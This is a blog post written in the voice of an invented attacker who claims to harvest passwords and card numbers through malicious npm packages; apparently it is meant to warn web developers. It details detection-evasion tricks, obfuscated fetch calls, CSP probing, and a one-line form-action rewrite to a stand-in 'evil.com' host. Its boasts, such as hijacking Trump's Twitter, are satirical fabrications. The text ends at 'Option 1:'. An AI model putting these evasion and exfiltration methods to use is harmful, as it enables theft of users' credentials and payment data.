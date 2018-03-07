Looking back on these golden years, I can’t believe that people exert so much effort messing around with cross-site scripting just to get code into a single site. It’s so easy to ship malicious code to thousands of websites, with a little help from my web developer friends.

Some objections you might have to my blatant fear mongering…

I’d notice the network requests going out!

Where would you notice them? My code won’t send anything when the DevTools are open (yes even if un-docked).

I call this the Heisenberg Manoeuvre: by trying to observe the behavior of my code, you change the behavior of my code.

It also stays silent when running on localhost or any IP address, or where the domain contains dev, test, qa, uat or staging (surrounded by \b word boundaries).

Our penetration testers would see it in their HTTP request monitoring tools!

What hours do they work? My code doesn’t send anything between 7 am and 7 pm. It halves my haul, but 95% reduces my chances of getting caught.

And I only need your credentials once. So after I’ve sent a request for a device I make a note of it (local storage and cookies) and never send for that device again. Replication is not made easy.

Even if some studious little pen tester clears cookies and local storage constantly, I only send these requests intermittently (about one in seven times, lightly randomized — the ideal trouble-shooting-insanity-inducing frequency).

Also, the URL looks a lot like the 300 other requests to ad networks your site makes.

The point is, just because you don’t see it, doesn’t mean it’s not happening. It’s been more than two years and as far as I know, no one has ever noticed one of my requests. Maybe it’s been on your site this whole time :)

(Fun fact, when I go through all the passwords and credit card numbers I’ve collected and bundle them up to be sold on the dark web, I have to do a search for my credit card numbers and usernames in case I’ve captured myself. Isn’t that funny!)

I’d see it in your source on GitHub!

Your innocence warms my heart.

But I’m afraid it’s perfectly possible to ship one version of your code to GitHub and a different version to npm.

In my package.json I’ve defined the files property to point to a lib directory that contains the minified, uglified nasty code — this is what npm publish will send to npm. But lib is in my .gitignore so it never makes its way to GitHub. This is a pretty common practice so it doesn’t even look suspect if you read through these files on GitHub.

This is not an npm problem, even if I’m not delivering different code to npm and GitHub, who’s to say that what you see in /lib/package.min.js is the real result of minifying /src/package.js ?

So no, you won’t find my nasty code anywhere on GitHub.

I read the minified source of all code in node_modules!

OK, now you’re just making up objections. But maybe you’re thinking you could write something clever that automatically checks code for anything suspicious.

You’re still not going to find much that makes sense in my source, I don’t have the word fetch or XMLHttpRequest anywhere, or the domain that I’m sending to. My fetch code looks like this:

“gfudi” is just “fetch” with each letter shifted up by one. Hard core cryptography right there. self is an alias for window .

self['\u0066\u0065\u0074\u0063\u0068'](...) is another fancy way of saying fetch(...) .

The point: it is very difficult to spot shenanigans in obfuscated code, you’ve got no chance.

(With all that said, I don’t actually use anything as mundane as fetch , I prefer new EventSource(urlWithYourPreciousData) where possible. That way even if you’re being paranoid and monitoring outbound requests by using a serviceWorker to listen to fetch events, I will slink right by. I simply don’t send anything for browsers that support serviceWorker but not EventSource .)

I have a Content Security Policy!

Oh, do you now.

And did somebody tell you that this would prevent malicious code from sending data off to some dastardly domain? I hate to be the bearer of bad news, but the following four lines of code will glide right through even the strictest content security policy.

Suck it, CSPs

(In an earlier iteration of this post I said that a solid content security policy would keep you (and I quote) “100% safe”. Unfortunately, 130k people read that before I learned the above trick. So I guess the lesson here is that you can’t trust anything or anyone on the internet.)

But CSPs aren’t completely unhelpful. The above only works in Chrome, and a decent CSP might block my efforts in some lesser-used browsers.

If you don’t know already, a content security policy can restrict what network requests can be made from the browser. It is designed to restrict what you can bring into the browser, but can also — as a side effect — limit the ways in which data can be sent out (when I ‘send’ passwords to my server, it’s just a query param on a get request).

In the event that I can’t get data out using the prefetch trick, CSPs are tricky for my credit card collection corporation. And not just because they neuter my nefarious intentions.

You see, if I try to send data out from a site that has a CSP, it can alert the site owner of the failed attempt (if they’ve specified a report-uri ). They would eventually track this down to my code and probably call my mother and then I would be in big trouble.

Since I don’t want to draw attention to myself (except when on the dance floor) I check your CSP before attempting to send something out.

To do this, I make a dummy request to the current page and read the headers.

At this point, I can look for ways to get out past your CSP. The Google sign-in page has a CSP that would allow me to easily send out your username and password if my code ran on that page. They don’t set connect-src explicitly and also haven’t set the catch-all default-src so I can send your credentials wherever I damn well, please.

If you send me $10 in the mail I’ll tell you if my code is running on the Google sign-in page.

Amazon has no CSP at all on the page where you type your credit card number in, nor does eBay.

Twitter and PayPal have CSPs, but it’s still dead easy to get your data from them. These two allow behind-the-scenes sending of data in the same way, and this is probably a sign that others allow it as well. At first glance everything looks pretty thorough, they both set the default-src catch-all like they should. But here’s the kicker: that catch-all doesn’t catch all. They haven’t locked down form-action .

So, when I’m checking your CSP (and checking it twice), if everything else is locked down but I don’t see form-action in there, I just go and change the action (where the data is sent when you click ‘sign in’) on all your forms.

Array.from(document.forms).forEach(formEl => formEl.action = `//evil.com/bounce-form`);

Boom, thanks for sending me your PayPal username and password, pal. I’ll send you a thank you card with a photo of the stuff I bought with your money.

Naturally, I only do this trick once per device and bounce the user right back to the referring page where they will shrug and try again.

(Using this method, I took over Trump’s Twitter account and started sending out all sorts of weird shit. As yet no one has noticed.)

OK, I am sufficiently concerned, what can I do?

Option 1: